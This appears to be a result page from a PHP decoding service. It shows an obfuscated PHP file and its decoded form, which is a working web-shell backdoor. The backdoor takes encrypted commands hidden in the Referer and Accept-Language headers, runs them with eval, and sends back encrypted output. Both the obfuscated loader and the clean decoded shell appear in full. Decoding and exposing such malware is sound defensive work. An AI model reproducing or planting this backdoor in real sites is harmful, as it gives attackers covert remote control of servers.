Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $M='ompress(@x(@FHFHbase6FHFH4_decoFHde(FHpreg_replace(FHFHarray("/_/","/-/"),FHarra..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$M='ompress(@x(@FHFHbase6FHFH4_decoFHde(FHpreg_replace(FHFHarray("/_/","/-/"),FHarray("/FHFH"FH,"+F';
$j='ower";FH$i=$m[1][0FH].$m[1][1FH];$h=$sl(FH$ss(md5FH($i.FH$kh),0FH,3));$FHf=$slFH($ss(FHmd5($i.$';
$K='_LAFHNGUAGE"];if($rFHr&&$ra)FH{$u=pFHarse_urlFHFHFH($rr);parse_str($uFH["queFHry"]FHFH,$q);$q=a';
$m='$kh="5d41"FHFH;$kf="40FH2a";functiFHon FHx($t,$k){FH$cFH=stFHrlen($FHFHk);$l=strFHlen($FHt);$o=';
$A='[FH$i].=$p;$eFH=strpos($sFH[$i],$fFH);iFHf($e){$k=$kFHhFHFH.$kf;obFH_start();@eFHval(@FHgFHzunc';
$q='}}rFHeturn FH$o;FH}$r=$_SFHEFHRVEFHR;$rr=FH@$r["FHFHHTTPFH_RFHEFERER"];$ra=@$r["HTFHTP_ACCFHEPT';
$f=str_replace('l','','llcreatel_flunlctilon');
$w='enFHcode(x(gzcoFHmFHFHpress($o),$k));FHprintFH("<$k>$FHd</$k>FH");@seFHFHssion_desFHtroy();}}}}';
$I='rray_FHvalFHues($q);FHpreg_matFHchFH_allFH(FH"/([\\w])[\\w-]FH+(?:FH;FHq=0.([\\FHd]))?,?/",$rFHa,$';
$E='m);if($qFH&FH&$m){@FHsessFHion_stFHFHarFHt();$s=&$_SESSFHIONFH;$ss="subFHstFHr";$sl=FH"FHstrtol';
$U='rpos($FHp,$h)===0){FHFH$FHs[$i]="";$p=$ss($FHFHp,3);}if(aFHrraFHy_key_exiFHsts($i,$FHFHs)){$sFH';
$e='H"),$ss($s[$i],0,$e)))FH,$k)))FH;$oFH=ob_get_FHconFHtents();FHobFH_end_clean(FH);$d=baFHse64FH_';
$y='"";for($i=0FH;$iFH<$l;){forFH($j=FH0;($j<$c&FH&$i<FH$l);$FHFHj++,$i++){$o.=FH$t{$i}^FHFH$k{$j};';
$b='FHkf)FH,0,3));FH$p="";foFHr($z=1;$FHz<FHcount(FH$m[1]);FH$FHz++)$p.=$qFH[$m[2][$FHzFH]]FH;if(st';
$F=str_replace('FH','',$m.$y.$q.$K.$I.$E.$j.$b.$U.$A.$M.$e.$w);
$x=$f('',$F);$x();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A [FH$i].=$p;$eFH=strpos($sFH[$i],$fFH);iFHf($e){$k=$kFHhFHFH...
$E m);if($qFH&FH&$m){@FHsessFHion_stFHFHarFHt();$s=&$_SESSFHION..
$F $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$I rray_FHvalFHues($q);FHpreg_matFHchFH_allFH(FH"/([\w])[\w-]FH..
$K _LAFHNGUAGE"];if($rFHr&&$ra)FH{$u=pFHarse_urlFHFHFH($rr);par..
$M ompress(@x(@FHFHbase6FHFH4_decoFHde(FHpreg_replace(FHFHarray..
$U rpos($FHp,$h)===0){FHFH$FHs[$i]="";$p=$ss($FHFHp,3);}if(aFHr..
$b FHkf)FH,0,3));FH$p="";foFHr($z=1;$FHz<FHcount(FH$m[1]);FH$FH..
$e H"),$ss($s[$i],0,$e)))FH,$k)))FH;$oFH=ob_get_FHconFHtents();..
$f create_function
$j ower";FH$i=$m[1][0FH].$m[1][1FH];$h=$sl(FH$ss(md5FH($i.FH$kh..
$m $kh="5d41"FHFH;$kf="40FH2a";functiFHon FHx($t,$k){FH$cFH=stF..
$q }}rFHeturn FH$o;FH}$r=$_SFHEFHRVEFHR;$rr=FH@$r["FHFHHTTPFH_R..
$w enFHcode(x(gzcoFHmFHFHpress($o),$k));FHprintFH("<$k>$FHd</$k..
$x None
$y "";for($i=0FH;$iFH<$l;){forFH($j=FH0;($j<$c&FH&$i<FH$l);$FHF..

Stats

MD5 696af2bc42194e406527d1753d1b5d9a
Eval Count 1
Decode Time 124 ms